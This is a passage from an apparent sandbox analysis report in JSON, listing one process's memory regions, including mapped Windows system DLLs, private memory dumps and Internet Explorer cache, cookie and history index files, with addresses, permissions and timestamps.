"00:00:26.309", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1937702912, "type": "region", "version": 1 }, "end_va": 1937838079, "entry_point": 1937702912, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_471", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1937702912, "timestamp": "00:00:26.309", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000472-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_54", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_472", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:26.309", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1994326016, "type": "region", "version": 1 }, "end_va": 1994608639, "entry_point": 1994326016, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_473", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1994326016, "timestamp": "00:00:26.310", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_474", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:00:26.311", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000475-addr_0x0000000000210000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_55", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_475", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:26.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2605055, "entry_point": 2228224, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_476", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 2228224, "timestamp": "00:00:26.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_478", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:00:26.518", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000479-addr_0x0000000000220000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_56", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_479", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:00:26.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 19595264, "type": "region", "version": 1 }, "end_va": 20508671, "entry_point": 0, "filename": null, "id": "region_480", "name": "pagefile_0x00000000012b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19595264, "timestamp": "00:00:26.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1941766144, "type": "region", "version": 1 }, "end_va": 1941843967, "entry_point": 1941766144, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_481", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1941766144, "timestamp": "00:00:26.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 21954560, "type": "region", "version": 1 }, "end_va": 24899583, "entry_point": 21954560, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_482", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 21954560, "timestamp": "00:00:26.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2523135, "entry_point": 2490368, "filename": "\\Windows\\System32\\en-US\\urlmon.dll.mui", "id": "region_483", "name": "urlmon.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\urlmon.dll.mui", "region_type": "memory_mapped_file", "start_va": 2490368, "timestamp": "00:00:26.551", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2559999, "entry_point": 0, "filename": null, "id": "region_484", "name": "pagefile_0x0000000000270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2555904, "timestamp": "00:00:26.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1990918144, "type": "region", "version": 1 }, "end_va": 1991454719, "entry_point": 1990918144, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_485", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1990918144, "timestamp": "00:00:26.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2625535, "entry_point": 0, "filename": null, "id": "region_486", "name": "pagefile_0x0000000000280000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2621440, "timestamp": "00:00:26.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 2686976, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_487", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 2686976, "timestamp": "00:00:26.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2760703, "entry_point": 0, "filename": null, "id": "region_488", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:00:26.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1948377087, "entry_point": 1946681344, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_489", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:00:26.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2891775, "entry_point": 0, "filename": null, "id": "region_491", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:00:26.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1962737664, "type": "region", "version": 1 }, "end_va": 1962848255, "entry_point": 1962737664, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_492", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1962737664, "timestamp": "00:00:26.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 0, "filename": null, "id": "region_493", "name": "pagefile_0x0000000000290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2686976, "timestamp": "00:00:26.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2957311, "entry_point": 0, "filename": null, "id": "region_494", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:00:26.677", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_495", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:00:26.677", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3018751, "entry_point": 0, "filename": null, "id": "region_496", "name": "pagefile_0x00000000002e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3014656, "timestamp": "00:00:26.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1963589632, "type": "region", "version": 1 }, "end_va": 1963634687, "entry_point": 1963589632, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_497", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1963589632, "timestamp": "00:00:26.681", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000498-addr_0x00000000002f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_57", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 3080192, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_498", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 3080192, "timestamp": "00:00:26.687", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000499-addr_0x0000000000300000-size_0x0000000000008000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_58", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 32768, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3178495, "entry_point": 3145728, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_499", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 3145728, "timestamp": "00:00:26.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000500-addr_0x00000000004e0000-size_0x000000000000c000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_59", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 49152, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 5160959, "entry_point": 5111808, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_500", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 5111808, "timestamp": "00:00:26.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997340672, "type": "region", "version": 1 }, "end_va": 1997557759, "entry_point": 1997340672, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_501", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997340672, "timestamp": "00:00:26.698", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1997103103, "entry_point": 1997078528, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_502", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:26.798", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000503-addr_0x00000000004f0000-size_0x0000000000050000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_60", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 327680, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5505023, "entry_point": 0, "filename": null, "id": "region_503", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:00:26.801", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1956577280, "type": "region", "version": 1 }, "end_va": 1956855807, "entry_point": 1956577280, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_504", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1956577280, "timestamp": "00:00:26.806", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000505-addr_0x00000000017c0000-size_0x0000000000230000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_61", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2293760, "start_va": 24903680, "type": "region", "version": 1 }, "end_va": 27197439, "entry_point": 0, "filename": null, "id": "region_505", "name": "private_0x00000000017c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 24903680, "timestamp": "00:00:26.892", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1933312000, "type": "region", "version": 1 }, "end_va": 1933426687, "entry_point": 1933312000, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_506", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1933312000, "timestamp": "00:00:26.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1933246464, "type": "region", "version": 1 }, "end_va": 1933275135, "entry_point": 1933246464, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_507", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1933246464, "timestamp": "00:00:26.964", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000508-addr_0x0000000001a30000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_62", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 27459584, "type": "region", "version": 1 }, "end_va": 28508159, "entry_point": 0, "filename": null, "id": "region_508", "name": "private_0x0000000001a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 27459584, "timestamp": "00:00:27.014", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000509-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_63", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_509", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:27.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1922236416, "type": "region", "version": 1 }, "end_va": 1922572287, "entry_point": 1922236416, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_510", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1922236416, "timestamp": "00:00:27.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1922105344, "type": "region", "version": 1 }, "end_va": 1922191359, "entry_point": 1922105344, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_511", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1922105344, "timestamp": "00:00:27.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1937899520, "type": "region", "version": 1 }, "end_va": 1937952767, "entry_point": 1937899520, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_512", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1937899520, "timestamp": "00:00:27.162", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000513-addr_0x0000000001860000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_64", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 26607615, "entry_point": 0, "filename": null, "id": "region_513", "name": "private_0x0000000001860000", "norm_filename": null, "region_type": "private_memory", "start_va": 25559040, "timestamp": "00:00:27.171", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000514-addr_0x00000000019b0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_65", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 26935296, "type": "region", "version": 1 }, "end_va": 27197439, "entry_point": 0, "filename": null, "id": "region_514", "name": "private_0x00000000019b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 26935296, "timestamp": "00:00:27.171", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000515-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_66", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_515", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:27.172", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000516-addr_0x00000000004f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_67", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5181439, "entry_point": 0, "filename": null, "id": "region_516", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:00:27.173", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000517-addr_0x0000000000500000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_68", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 5505023, "entry_point": 0, "filename": null, "id": "region_517", "name": "private_0x0000000000500000", "norm_filename": null, "region_type": "private_memory", "start_va": 5242880, "timestamp": "00:00:27.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5181439, "entry_point": 0, "filename": null, "id": "region_518", "name": "pagefile_0x00000000004f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5177344, "timestamp": "00:00:27.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1915224064, "type": "region", "version": 1 }, "end_va": 1915248639, "entry_point": 1915224064, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_519", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1915224064, "timestamp": "00:00:27.176", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000520-addr_0x0000000001cd0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_69", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 30212096, "type": "region", "version": 1 }, "end_va": 31260671, "entry_point": 0, "filename": null, "id": "region_520", "name": "private_0x0000000001cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30212096, "timestamp": "00:00:27.206", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1934491648, "type": "region", "version": 1 }, "end_va": 1934557183, "entry_point": 1934491648, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_521", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1934491648, "timestamp": "00:00:27.206", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000522-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_70", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_522", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:00:27.248", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000523-addr_0x0000000001b30000-size_0x0000000000160000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_71", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1441792, "start_va": 28508160, "type": "region", "version": 1 }, "end_va": 29949951, "entry_point": 0, "filename": null, "id": "region_523", "name": "private_0x0000000001b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 28508160, "timestamp": "00:00:27.249", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000524-addr_0x0000000001dd0000-size_0x00000000001d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_72", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1900544, "start_va": 31260672, "type": "region", "version": 1 }, "end_va": 33161215, "entry_point": 0, "filename": null, "id": "region_524", "name": "private_0x0000000001dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31260672, "timestamp": "00:00:27.250", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000525-addr_0x0000000001b30000-size_0x0000000000140000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_73", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1310720, "start_va": 28508160, "type": "region", "version": 1 }, "end_va": 29818879, "entry_point": 0, "filename": null, "id": "region_525", "name": "private_0x0000000001b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 28508160, "timestamp": "00:00:27.251", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000526-addr_0x0000000001c80000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_74", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29884416, "type": "region", "version": 1 }, "end_va": 29949951, "entry_point": 0, "filename": null, "id": "region_526", "name": "private_0x0000000001c80000", "norm_filename": null, 